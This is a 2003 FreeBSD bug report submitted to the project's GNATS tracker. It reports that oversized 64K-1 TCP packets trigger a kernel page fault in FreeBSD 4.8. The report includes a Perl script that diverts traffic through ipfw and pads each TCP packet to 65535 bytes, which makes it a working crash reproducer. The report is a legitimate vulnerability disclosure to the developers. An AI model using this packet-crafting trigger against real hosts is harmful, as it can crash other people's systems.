From njh@despammed.com  Thu Jul 10 01:10:17 2003
Return-Path: <njh@despammed.com>
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id B907A37B401
	for <FreeBSD-gnats-submit@freebsd.org>; Thu, 10 Jul 2003 01:10:17 -0700 (PDT)
Received: from anchor-post-39.mail.demon.net (anchor-post-39.mail.demon.net [194.217.242.80])
	by mx1.FreeBSD.org (Postfix) with ESMTP id F38E143F93
	for <FreeBSD-gnats-submit@freebsd.org>; Thu, 10 Jul 2003 01:10:16 -0700 (PDT)
	(envelope-from njh@despammed.com)
Received: from mailgate.gec1testlab.co.uk ([80.177.181.146] helo=gsec1.com)
	by anchor-post-39.mail.demon.net with esmtp (Exim 3.36 #2)
	id 19aWVL-0001vA-0U
	for FreeBSD-gnats-submit@freebsd.org; Thu, 10 Jul 2003 09:10:15 +0100
Received: from 192.168.20.19 ([192.168.20.19]) by gsec1.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Thu, 10 Jul 2003 09:11:30 +0100
Message-Id: <200307100910.14218.njh@despammed.com>
Date: Thu, 10 Jul 2003 09:10:14 +0100
From: Nigel Horne <njh@despammed.com>
To: FreeBSD-gnats-submit@freebsd.org
Subject: TCP Packet of 64K-1 crashes FreeBSD4.8

>Number:         54309
>Category:       kern
>Synopsis:       TCP Packet of 64K-1 crashes FreeBSD4.8
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    silby
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Thu Jul 10 01:20:21 PDT 2003
>Closed-Date:    
>Last-Modified:  Thu Jul 10 23:11:09 PDT 2003
>Originator:     Nigel Horne
>Release:        FreeBSD 4.8-RELEASE i386
>Organization:
NJH Music
>Environment:
System: FreeBSD gsec1.itac-uk.com 4.8-RELEASE FreeBSD 4.8-RELEASE #0: Wed Jul 
9 13:46:32 BST 2003 njh@dev.itac.local:/usr/obj/usr/src/sys/NJHKERNEL i386




        IBM, FreeBSD4.8
>Description:

        A simple perl program (see attached) causes a kernel page fault
>How-To-Repeat:
#!/usr/bin/perl -wT

# To be run as root under FreeBSD
# First do: ipfw add divert 9999 tcp from any to <ip> 3994
# Where <ip> is the IP address of the prodigy, e.g. 192.168.3.40
# You may need to reconfigure BSD first to support ipfw:
# options         IPFIREWALL
# options         IPDIVERT
# options         IPFIREWALL_FORWARD
# options         IPFIREWALL_VERBOSE
# options         IPFIREWALL_VERBOSE_LIMIT=100
# options         IPFIREWALL_DEFAULT_TO_ACCEPT
# options         IPFILTER
# options         IPFILTER_LOG
# options         TCPDEBUG
# options         TCP_DROP_SYNFIN
# options         ICMP_BANDLIM
# options         DUMMYNET
# options         IPSTEALTH
#
# Then try telnet 192.168.3.40 3994, sit back and watch the output

use strict;
use Net::Divert;
use NetPacket::IP;
use NetPacket::TCP;

my $ipFilter = Net::Divert->new('dev.gsec1.local', 9999);

$ipFilter->getPackets(\&handler);

sub handler {
        my($packet, $fwtag) = @_;

        my $ip = NetPacket::IP->decode($packet);

        if($ip->{proto} == NetPacket::IP->IP_PROTO_TCP) {
                my $tcp = NetPacket::TCP->decode($ip->{data});

                print "source " . $tcp->{src_port} . " dest " . 
$tcp->{dest_port} . "\n";

                # $tcp->{flags} |= SYN;
                # $tcp->{flags} &= ~ACK;

                # $tcp->{seqnum} = 0;

                $tcp->{data} = 'x' x 65535;

                $ip->{data} = $tcp->encode($ip);

                $packet = $ip->encode;

        }
        $ipFilter->putPacket($packet, $fwtag);
}
>Fix:

-- 
Nigel Horne. Arranger, Composer, Conductor, Typesetter.
Owner of the brass band group of the Internet. ICQ#20252325
njh@bandsman.co.uk http://www.bandsman.co.uk/music.htm
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->silby 
Responsible-Changed-By: silby 
Responsible-Changed-When: Thu Jul 10 23:10:57 PDT 2003 
Responsible-Changed-Why:  
I'd better look at this... 

http://www.freebsd.org/cgi/query-pr.cgi?pr=54309 
>Unformatted:
